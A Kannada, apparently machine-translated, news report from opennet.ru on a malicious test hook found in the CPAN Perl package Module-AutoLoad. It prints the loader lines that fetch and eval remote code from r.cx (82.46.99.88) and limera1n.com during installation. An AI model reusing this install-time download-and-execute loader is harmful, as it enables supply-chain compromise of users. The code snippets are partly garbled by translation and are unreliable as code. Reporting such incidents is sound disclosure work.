ಮಾಡ್ಯೂಲ್-ಆಟೋಲೋಡ್ ಪರ್ಲ್ ಪ್ಯಾಕೇಜ್‌ನಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಪತ್ತೆಯಾಗಿದೆ

CPAN ಡೈರೆಕ್ಟರಿಯ ಮೂಲಕ ವಿತರಿಸಲಾದ ಪರ್ಲ್ ಪ್ಯಾಕೇಜ್‌ನಲ್ಲಿ ಮಾಡ್ಯೂಲ್-ಆಟೋಲೋಡ್, ಹಾರಾಡುತ್ತಿರುವಾಗ CPAN ಮಾಡ್ಯೂಲ್‌ಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಲೋಡ್ ಮಾಡಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ, ಗುರುತಿಸಲಾಗಿದೆ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್. ದುರುದ್ದೇಶಪೂರಿತ ಇನ್ಸರ್ಟ್ ಆಗಿತ್ತು ಕಂಡು ಪರೀಕ್ಷಾ ಕೋಡ್‌ನಲ್ಲಿ 05_rcx.t, ಇದು 2011 ರಿಂದ ರವಾನೆಯಾಗುತ್ತಿದೆ.
ಪ್ರಶ್ನಾರ್ಹ ಕೋಡ್ ಅನ್ನು ಲೋಡ್ ಮಾಡುವ ಬಗ್ಗೆ ಪ್ರಶ್ನೆಗಳು ಉದ್ಭವಿಸಿದವು ಎಂಬುದು ಗಮನಾರ್ಹವಾಗಿದೆ ಸ್ಟಾಕ್ಓವರ್ಫ್ಲೋ 2016 ರಲ್ಲಿ ಹಿಂತಿರುಗಿ.

ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಸ್ಥಾಪಿಸುವಾಗ ಪ್ರಾರಂಭಿಸಲಾದ ಪರೀಕ್ಷಾ ಸೂಟ್‌ನ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯ ಸಮಯದಲ್ಲಿ ಮೂರನೇ ವ್ಯಕ್ತಿಯ ಸರ್ವರ್‌ನಿಂದ (http://r.cx:1/) ಕೋಡ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡುವ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಪ್ರಯತ್ನಕ್ಕೆ ದುರುದ್ದೇಶಪೂರಿತ ಚಟುವಟಿಕೆಯು ಕುದಿಯುತ್ತದೆ. ಬಾಹ್ಯ ಸರ್ವರ್‌ನಿಂದ ಆರಂಭದಲ್ಲಿ ಡೌನ್‌ಲೋಡ್ ಮಾಡಲಾದ ಕೋಡ್ ದುರುದ್ದೇಶಪೂರಿತವಾಗಿಲ್ಲ ಎಂದು ಭಾವಿಸಲಾಗಿದೆ, ಆದರೆ ಈಗ ವಿನಂತಿಯನ್ನು ww.limera1n.com ಡೊಮೇನ್‌ಗೆ ಮರುನಿರ್ದೇಶಿಸಲಾಗಿದೆ, ಇದು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಕೋಡ್‌ನ ಅದರ ಭಾಗವನ್ನು ಒದಗಿಸುತ್ತದೆ.

ಫೈಲ್‌ನಲ್ಲಿ ಡೌನ್‌ಲೋಡ್ ಅನ್ನು ಸಂಘಟಿಸಲು 05_rcx.t ಕೆಳಗಿನ ಕೋಡ್ ಅನ್ನು ಬಳಸಲಾಗುತ್ತದೆ:

ನನ್ನ $prog = __FILE__;
$prog =~ s {[^/]+\.t}{../contrib/RCX.pl}x;
ನನ್ನ $ಪ್ರಯತ್ನ = `$^X $prog`;

ನಿರ್ದಿಷ್ಟಪಡಿಸಿದ ಕೋಡ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲು ಕಾರಣವಾಗುತ್ತದೆ ../contrib/RCX.pl, ಅದರ ವಿಷಯಗಳನ್ನು ಸಾಲಿಗೆ ಇಳಿಸಲಾಗಿದೆ:

lib do{eval<$b>&&botstrap("RCX")if$b=ಹೊಸ IO::Socket::INET 82.46.99.88.":1″};

ಈ ಸ್ಕ್ರಿಪ್ಟ್ ಲೋಡ್ ಆಗುತ್ತದೆ ಗೊಂದಲ ಸೇವೆಯನ್ನು ಬಳಸುವುದು perlobfuscator.com ಬಾಹ್ಯ ಹೋಸ್ಟ್ r.cx ನಿಂದ ಕೋಡ್ (ಕ್ಯಾರೆಕ್ಟರ್ ಕೋಡ್‌ಗಳು 82.46.99.88 "R.cX" ಪಠ್ಯಕ್ಕೆ ಅನುಗುಣವಾಗಿರುತ್ತವೆ) ಮತ್ತು ಅದನ್ನು eval ಬ್ಲಾಕ್‌ನಲ್ಲಿ ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ.

$ perl -MIO::Socket -e'$b=ಹೊಸ IO::Socket::INET 82.46.99.88.":1″; ಮುದ್ರಿಸು <$b>;'
eval ಅನ್ಪ್ಯಾಕ್ u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

ಅನ್ಪ್ಯಾಕ್ ಮಾಡಿದ ನಂತರ, ಈ ಕೆಳಗಿನವುಗಳನ್ನು ಅಂತಿಮವಾಗಿ ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗುತ್ತದೆ: ಕೋಡ್:

ಪ್ರಿಂಟ್{$b=ಹೊಸ IO::ಸಾಕೆಟ್::INET"ww.limera1n.com:80″}"GET /iJailBreak
"; evalor ರಿಟರ್ನ್ ಎಚ್ಚರಿಕೆ$@while$b;1

ಸಮಸ್ಯಾತ್ಮಕ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಈಗ ರೆಪೊಸಿಟರಿಯಿಂದ ತೆಗೆದುಹಾಕಲಾಗಿದೆ. ವಿರಾಮಗೊಳಿಸಿ (ಪರ್ಲ್ ಲೇಖಕರು ಅಪ್‌ಲೋಡ್ ಸರ್ವರ್), ಮತ್ತು ಮಾಡ್ಯೂಲ್ ಲೇಖಕರ ಖಾತೆಯನ್ನು ನಿರ್ಬಂಧಿಸಲಾಗಿದೆ. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಮಾಡ್ಯೂಲ್ ಇನ್ನೂ ಉಳಿದಿದೆ ಲಭ್ಯವಿದೆ MetaCPAN ಆರ್ಕೈವ್‌ನಲ್ಲಿ ಮತ್ತು cpanminus ನಂತಹ ಕೆಲವು ಉಪಯುಕ್ತತೆಗಳನ್ನು ಬಳಸಿಕೊಂಡು MetaCPAN ನಿಂದ ನೇರವಾಗಿ ಸ್ಥಾಪಿಸಬಹುದು. ಇದನ್ನು ಗಮನಿಸಲಾಗಿದೆಪ್ಯಾಕೇಜ್ ಅನ್ನು ವ್ಯಾಪಕವಾಗಿ ವಿತರಿಸಲಾಗಿಲ್ಲ.

ಚರ್ಚಿಸಲು ಆಸಕ್ತಿದಾಯಕವಾಗಿದೆ ಸಂಪರ್ಕಿಸಲಾಗಿದೆ ಮತ್ತು ಮಾಡ್ಯೂಲ್‌ನ ಲೇಖಕ, ತನ್ನ ಸೈಟ್ "r.cx" ಅನ್ನು ಹ್ಯಾಕ್ ಮಾಡಿದ ನಂತರ ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಅನ್ನು ಸೇರಿಸಲಾಗಿದೆ ಎಂಬ ಮಾಹಿತಿಯನ್ನು ನಿರಾಕರಿಸಿದರು ಮತ್ತು ಅವರು ಕೇವಲ ಮೋಜು ಮಾಡುತ್ತಿದ್ದಾರೆ ಎಂದು ವಿವರಿಸಿದರು ಮತ್ತು ಏನನ್ನಾದರೂ ಮರೆಮಾಡಲು ಅಲ್ಲ, ಆದರೆ ಗಾತ್ರವನ್ನು ಕಡಿಮೆ ಮಾಡಲು perlobfuscator.com ಅನ್ನು ಬಳಸಿದರು ಕೋಡ್‌ನ ಮತ್ತು ಕ್ಲಿಪ್‌ಬೋರ್ಡ್ ಮೂಲಕ ನಕಲು ಮಾಡುವುದನ್ನು ಸರಳಗೊಳಿಸುವುದು. "ಬೋಟ್‌ಸ್ಟ್ರಾಪ್" ಎಂಬ ಕಾರ್ಯದ ಹೆಸರಿನ ಆಯ್ಕೆಯು ಈ ಪದವು "ಬೋಟ್‌ನಂತೆ ಧ್ವನಿಸುತ್ತದೆ ಮತ್ತು ಬೂಟ್‌ಸ್ಟ್ರಾಪ್‌ಗಿಂತ ಚಿಕ್ಕದಾಗಿದೆ" ಎಂಬ ಅಂಶದಿಂದ ವಿವರಿಸಲಾಗಿದೆ. ಗುರುತಿಸಲಾದ ಮ್ಯಾನಿಪ್ಯುಲೇಷನ್‌ಗಳು ದುರುದ್ದೇಶಪೂರಿತ ಕ್ರಿಯೆಗಳನ್ನು ಮಾಡುವುದಿಲ್ಲ ಎಂದು ಮಾಡ್ಯೂಲ್‌ನ ಲೇಖಕರು ಭರವಸೆ ನೀಡಿದರು, ಆದರೆ TCP ಮೂಲಕ ಕೋಡ್‌ನ ಲೋಡಿಂಗ್ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯನ್ನು ಮಾತ್ರ ಪ್ರದರ್ಶಿಸುತ್ತಾರೆ.

ಮೂಲ: opennet.ru

ಕಾಮೆಂಟ್ ಅನ್ನು ಸೇರಿಸಿ